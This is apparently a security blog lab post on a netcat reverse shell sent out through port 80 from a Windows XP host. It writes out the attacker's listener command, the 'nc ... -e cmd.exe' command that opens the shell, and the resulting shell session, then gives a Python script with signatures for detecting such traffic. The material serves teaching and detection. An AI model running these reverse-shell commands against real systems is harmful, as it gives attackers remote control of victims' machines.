Monday, September 1, 2014

Setup and detect netcat reverse shell

In most cases (if not all), a firewall sits between the Internet and the internal network. While a firewall helps keep the bad guys out, what happens when the bad guys are already in is another issue.

In this post, we will assume the bad guy has already gained access to a system on the internal network. In addition, since we know most firewalls allow port 80 out, we will send a (reverse) shell out through the firewall to our bad guy. If we have an IPS in place, it should detect this type of traffic; if not, our firewall will more than likely allow the traffic through.

Our topology for this lab will be as follows:
Windows XP host - internal network
Bad guy - Internet -

While performing this lab, we will also capture the traffic with tcpdump:
root@securitynik:~# tcpdump -nnvvi eth0 port 80 -w netcat.pcap

Netcat listener on the bad guy's machine:
root@securitynik:~# nc -nnvl -p 80 -4
nc: listening on 80 ...

Now that we have our netcat listener running and we already have access to the computer on the internal LAN, let's send the shell out through the firewall.

C:\nc>nc -nnvv 80 -e c:\windows\system32\cmd.exe
(UNKNOWN) [] 80 (?) open

As can be seen, the connection was opened successfully. If we look at the console of the bad guy's computer, we see the following:

root@securitynik:~# nc -nnvl -p 80 -4

nc: listening on 80 ...
nc: connect to 80 from 1059
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


From the above, we can see that we now have full shell access to the system. To confirm what we've done, we will analyze the captured traffic in the next post.
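The post notes that an IPS should catch this traffic even though the firewall lets port 80 out. The reason it can is that the session above is not HTTP at all: the internal host's first bytes on the wire are the cmd.exe banner, not a request line. The following script is an added example, not code from the original post, and it generalizes the point: it flags any tcp/80 flow whose payload does not look like HTTP, and separately flags the Windows shell banner and drive-letter prompt that an `-e cmd.exe` shell sends back. It assumes the capture has already been reassembled into per-flow byte strings (what a tool such as Zeek or a scapy script would hand you); the flows, hosts and addresses below are constructed for the demonstration.

```python
"""Flag tcp/80 flows whose payload is not HTTP (added example, not from the post).

Assumes flows are already reassembled into dicts with the client's and the
server's first payload bytes. The sample flows below are constructed to
resemble what the tcpdump capture in the post would contain.
"""
import re

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ",
                b"OPTIONS ", b"CONNECT ", b"TRACE ", b"PATCH ")

# Strings a cmd.exe shell emits when it is attached to a socket.
SHELL_MARKERS = (
    re.compile(rb"Microsoft Windows [^\r\n]*\[Version [0-9.]+\]"),
    re.compile(rb"\(C\) Copyright \d{4}-\d{4} Microsoft Corp\."),
    re.compile(rb"(?m)^[A-Za-z]:\\[^\r\n]*>"),   # drive-letter prompt, e.g. C:\nc>
)


def is_http_request(data: bytes) -> bool:
    """True when the client's first bytes start with an HTTP method."""
    return data.startswith(HTTP_METHODS)


def is_http_response(data: bytes) -> bool:
    """True when the server's first bytes start with an HTTP status line."""
    return data.startswith(b"HTTP/1.") or data.startswith(b"HTTP/2")


def classify_flow(flow: dict) -> list:
    """Return a list of finding strings for one flow; empty means it looks like HTTP."""
    findings = []
    if flow["dst_port"] != 80:
        return findings
    client, server = flow["client_payload"], flow["server_payload"]
    # A legitimate web session has an HTTP request from the client and,
    # once the server speaks, an HTTP status line back.
    if not is_http_request(client) or (server and not is_http_response(server)):
        findings.append("non-HTTP payload on tcp/80")
    # Independently look for the shell banner/prompt on either side; in the
    # post's scenario the *client* (internal host) sends it to the listener.
    for side, data in (("client", client), ("server", server)):
        if any(pat.search(data) for pat in SHELL_MARKERS):
            findings.append(f"shell banner/prompt seen in {side} data")
    return findings


# Constructed sample flows: RFC 1918 sources, TEST-NET-1 destination.
SAMPLE_FLOWS = [
    {   # ordinary web request: should produce no findings
        "src": "10.0.0.5", "dst": "192.0.2.10", "dst_port": 80,
        "client_payload": b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n",
        "server_payload": b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>",
    },
    {   # reverse shell like the one in the post: banner first, command back
        "src": "10.0.0.7", "dst": "192.0.2.10", "dst_port": 80,
        "client_payload": (b"Microsoft Windows XP [Version 5.1.2600]\r\n"
                           b"(C) Copyright 1985-2001 Microsoft Corp.\r\n\r\nC:\\nc>"),
        "server_payload": b"dir\r\n",
    },
    {   # TLS ClientHello on port 80: not HTTP, but no shell marker either
        "src": "10.0.0.9", "dst": "192.0.2.10", "dst_port": 80,
        "client_payload": b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03",
        "server_payload": b"",
    },
]


def scan(flows=SAMPLE_FLOWS) -> dict:
    """Map each source address to its findings."""
    return {f["src"]: classify_flow(f) for f in flows}


if __name__ == "__main__":
    for src, findings in scan().items():
        print(src, "->", findings or "ok")
```

The two checks are deliberately separate: the "non-HTTP on tcp/80" heuristic catches the general case (any non-web protocol pushed through the firewall's open port, including the TLS example), while the banner and prompt patterns give a high-confidence hit for the exact session shown above. Protocol-aware tools apply the same idea: Zeek identifies protocols by content rather than port, and an IPS signature for the banner text is the equivalent of `SHELL_MARKERS`.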
